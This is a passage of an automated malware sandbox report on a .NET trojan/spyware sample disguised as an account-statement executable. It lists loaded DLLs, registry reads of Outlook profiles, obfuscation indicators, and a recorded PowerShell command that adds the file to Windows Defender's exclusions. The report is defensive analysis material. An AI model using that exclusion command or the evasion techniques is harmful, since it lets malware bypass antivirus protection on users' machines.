                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, apNwUAYQDNK2jjOBr5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, apNwUAYQDNK2jjOBr5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@1/1
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3432:120:WilError_03
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMutant created: \Sessions\1\BaseNamedObjects\mEkloRXObV
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbbsthxn.no0.ps1Jump to behavior
                      Source: hesaphareketi-.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: hesaphareketi-.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: hesaphareketi-.exeVirustotal: Detection: 36%
                      Source: hesaphareketi-.exeReversingLabs: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: hesaphareketi-.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: hesaphareketi-.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.cs.Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.cs.Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.cs.Net Code: EvP8jij8d0 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0573DBCB push CC057E19h; iretd 0_2_0573DBD5
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0577E420 push 0000C3FBh; ret 0_2_0577E435
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0577A4CB push 0000C3FBh; ret 0_2_0577A4E8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_067D42E8 push eax; iretd 4_2_067D42E9
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_067D3E40 pushfd ; retf 4_2_067D3E45
                      Source: hesaphareketi-.exeStatic PE information: section name: .text entropy: 7.927355797624177
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, zmrE9pD9ep1r9k23rF.csHigh entropy of concatenated method names: 'wimGep4Ncw', 'KDXGnPYBPu', 'MciGjDpAip', 'wBqG1Q3rMJ', 'uhpGgbyfNm', 'nW7GqfSrAP', 'CAWGHGkjDg', 'W6MGBrYn3c', 'OjfGQwqUuZ', 'KYPGvCZPa1'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, T07tVaZ0AMMeqsdvSwl.csHigh entropy of concatenated method names: 'B4kUeNA6jL', 'hsaUnoFX48', 'Tx0Ujltdkv', 'zluU15TMk2', 'LgAUgh2Bmb', 'dsSUqGVjnu', 'k3lUHgN4SV', 'kd7UBNgh6m', 'KaRUQ9Bjyn', 'YSxUvs1Nx5'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, wOCJmfL0gmf77p4iB8.csHigh entropy of concatenated method names: 'uJ1R73CtsP', 'OTXRMR9DA3', 'JlQcsD3f9m', 'xKKcywccaM', 'q4jRt8hF2Q', 'GTBR69eOmA', 'htlRxI57sh', 'f6ZRwU60FH', 'U1vR22fLmT', 'RwGRXTCAqw'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, uWkYiBZiTyhGfff9TEp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qDcSwaTQKO', 'wUMS2DJAuw', 'QnrSXN7oBl', 'VGASTPmky7', 'DEuSpuopLC', 'pD2SEAJrKI', 'LrOS4scT3B'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, apNwUAYQDNK2jjOBr5.csHigh entropy of concatenated method names: 'Ys5rwFb1q7', 'nKnr2qB7lf', 'yccrXKvVPo', 'jpNrTbvbsy', 'D9grpFBac8', 'iPArEmXaI6', 'WJer4OMdvY', 'tYkr7yX9Ph', 'cyArl9emlJ', 'snHrMdXG8c'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, QaepiORFDMaUInoOaF.csHigh entropy of concatenated method names: 'ssAci6ZJkn', 'i8ycOMombS', 'nWucLj9RAX', 'CUic34EU3t', 'TLDcwh7TSV', 'UuPcYYrULV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, ye8JTKJr83WH8wyxZ0.csHigh entropy of concatenated method names: 'hTBABjSKjX', 'JnaAQPNnAL', 'ue1AitWEsj', 'nnKAO8vZFx', 'XO3A310rCI', 'g12AYqgShn', 'lytAfrqbRT', 'cTeAkg5vdE', 'm8QA5oCyoc', 'IhPAtZuv9q'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, oQpmhd4r5iwAnLRPaP.csHigh entropy of concatenated method names: 'amJDVd9bri', 'IvrDeO1IMX', 'SjIDjOeH67', 'SEFD1UnAOl', 'RjKDq8sxfh', 'CsZDHRju43', 'n05DQB6Jqq', 'zaqDv3rdXQ', 'GhVFnEmCS4ggKaU4AtT', 'N027I1mh6yKcaFAtOsI'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, I2ZIZVPBTtNjif6squ.csHigh entropy of concatenated method names: 'RL3Z5YqOIC', 'PwOZ6GvKNL', 'lUfZwX8K1A', 'RVKZ2w23fY', 'iG9ZOTqo6V', 'oSXZLC8flE', 'S0AZ3ebxet', 'TAQZYaN6aE', 'LdLZhsrqYZ', 'XAsZf7Wmfw'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, RYSffYx74tovXyPNq8.csHigh entropy of concatenated method names: 'ACLdnDmMKAedtmc4Ubh', 'ijQ3lnmGea0YTc12irf', 'EeQDcrsvJH', 'P0ODU0qCRr', 'H5sDS267GD', 'W6hL13mc9dACZd6K0RF', 'SO7HKKmr069DKXxhXS4', 'oGlMvVmPs8grquUi5yI'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, Ns6WxG6JJs23MoSyQa.csHigh entropy of concatenated method names: 'Ec9DP1m7kJ', 'GXZDrlYRiN', 'hp0DNljyD1', 'obBDGj1QAv', 'cfUD05gIth', 'fGcNpJbEpw', 'HLINE2mi3f', 'GqIN4pIUXd', 'dv1N7jiYc7', 'gTpNl5qCa7'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, Lqr0bsOQB24ffAbaU0.csHigh entropy of concatenated method names: 'T9Lj2gp4y', 'UN01YOoT7', 'QRpqLcimi', 'zHOHpD2SH', 'KQ2Qh68ib', 'Wk1v24EUQ', 'XsvIVqDCVB277oitvs', 'F0YN3Uba74vef8q4Ns', 'aPTXUZ2qSbubpvCT6X', 'NCQcuYC87'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, zmiQjjSMJdWZJXd8i5.csHigh entropy of concatenated method names: 'N5QUywLRor', 'KTtUI9fgoB', 'YlCU8rcBAD', 'dfdUF2QpZ2', 'TLNUrE9gee', 'BE1UNcom57', 'f0dUDIpLWx', 'QFKc4rlyZF', 'Kb3c7p6UmA', 'XsVclN12jH'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, ON4CPXgoxV3DOvXlQ5.csHigh entropy of concatenated method names: 'k5iyG1cZBi', 'KQny0YEH2x', 'niYyamQWfY', 'q6gy9cUH4R', 'XgyyZLKmPb', 'WbTym5FWFj', 'dTqebX5xvev3HEc98g', 'R0uMN1WgtaZTc9Nc5O', 'v3Fyyq00mB', 'N26yIYWngm'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, PlruwwFSFIBK3gOuLd.csHigh entropy of concatenated method names: 'es3Rau1EMH', 'FBbR9OnXuQ', 'ToString', 'OquRFeKa6W', 'ImbRrO3PEk', 'nSvRuM5G26', 'hfERNpdWx7', 'Yt4RD4xrV4', 'ngIRGaqaRe', 'qjgR0t4ZyV'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.csHigh entropy of concatenated method names: 'mpRIPb1xbw', 'lywIF84dei', 'UIbIryE6JI', 'pxsIuLDrEk', 'BlrINROGGm', 'bcwID1NyU2', 'TGNIGdXspo', 'fNII0cJ2vm', 'FYHIJMZyv1', 'Gp5IaSaIXy'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, fVLyc0wGGeEWOEyCIF.csHigh entropy of concatenated method names: 'ToString', 'q5Kmt4iijv', 'e5rmOAOR2H', 'MykmLY8Tkm', 'tfsm3ZkqKd', 'VE7mYSFosR', 'SZRmhY3L48', 'Km2mfbHgu9', 'Hf8mkfAhFJ', 'ejymWvqasA'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, LnxKS42KcnqItRqAuu.csHigh entropy of concatenated method names: 'Dispose', 'XWiyllSwLx', 'PEYdOwCRtM', 'w5Vyysa243', 'fYwyMGOgX8', 'sJEyzwgtve', 'ProcessDialogKey', 'jk6ds2SYkm', 'ClqdybiHbe', 'o7LddJmdgE'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, LWO8HtWIprHTVfDJ67.csHigh entropy of concatenated method names: 'lUHcFpUWvN', 'i0LcracVbs', 'LpQcugyeoE', 'WnhcNJdsPJ', 'W80cDwPhZT', 'oNGcG0LnZa', 'KOFc08Nf3A', 'a6AcJDroc5', 'GtYcaMOp3o', 'vDQc9awuE2'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, BNsSQdbVfiKRX0TD04.csHigh entropy of concatenated method names: 'Fcdu1pnCE5', 'rA3uqHqgOY', 'QcWuB9AAJa', 'kY5uQ4EJIX', 'iqAuZEWVpV', 'kP2umN5yci', 'gn6uRIrgmc', 'rRIucGu9Cy', 'YlxuU1mRJ9', 'sPpuSWQVY2'
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, Yx3ZQZz8qF3UpkSV59.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CryUAGi7Zg', 'TX0UZTqhR6', 'y9eUmjDlRQ', 'rYOURDcnIL', 'CU6UcoN2lB', 'BHeUUkC0ju', 'p0PUS9SBSP'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, zmrE9pD9ep1r9k23rF.csHigh entropy of concatenated method names: 'wimGep4Ncw', 'KDXGnPYBPu', 'MciGjDpAip', 'wBqG1Q3rMJ', 'uhpGgbyfNm', 'nW7GqfSrAP', 'CAWGHGkjDg', 'W6MGBrYn3c', 'OjfGQwqUuZ', 'KYPGvCZPa1'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, T07tVaZ0AMMeqsdvSwl.csHigh entropy of concatenated method names: 'B4kUeNA6jL', 'hsaUnoFX48', 'Tx0Ujltdkv', 'zluU15TMk2', 'LgAUgh2Bmb', 'dsSUqGVjnu', 'k3lUHgN4SV', 'kd7UBNgh6m', 'KaRUQ9Bjyn', 'YSxUvs1Nx5'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, wOCJmfL0gmf77p4iB8.csHigh entropy of concatenated method names: 'uJ1R73CtsP', 'OTXRMR9DA3', 'JlQcsD3f9m', 'xKKcywccaM', 'q4jRt8hF2Q', 'GTBR69eOmA', 'htlRxI57sh', 'f6ZRwU60FH', 'U1vR22fLmT', 'RwGRXTCAqw'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, uWkYiBZiTyhGfff9TEp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qDcSwaTQKO', 'wUMS2DJAuw', 'QnrSXN7oBl', 'VGASTPmky7', 'DEuSpuopLC', 'pD2SEAJrKI', 'LrOS4scT3B'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, apNwUAYQDNK2jjOBr5.csHigh entropy of concatenated method names: 'Ys5rwFb1q7', 'nKnr2qB7lf', 'yccrXKvVPo', 'jpNrTbvbsy', 'D9grpFBac8', 'iPArEmXaI6', 'WJer4OMdvY', 'tYkr7yX9Ph', 'cyArl9emlJ', 'snHrMdXG8c'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, QaepiORFDMaUInoOaF.csHigh entropy of concatenated method names: 'ssAci6ZJkn', 'i8ycOMombS', 'nWucLj9RAX', 'CUic34EU3t', 'TLDcwh7TSV', 'UuPcYYrULV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, ye8JTKJr83WH8wyxZ0.csHigh entropy of concatenated method names: 'hTBABjSKjX', 'JnaAQPNnAL', 'ue1AitWEsj', 'nnKAO8vZFx', 'XO3A310rCI', 'g12AYqgShn', 'lytAfrqbRT', 'cTeAkg5vdE', 'm8QA5oCyoc', 'IhPAtZuv9q'
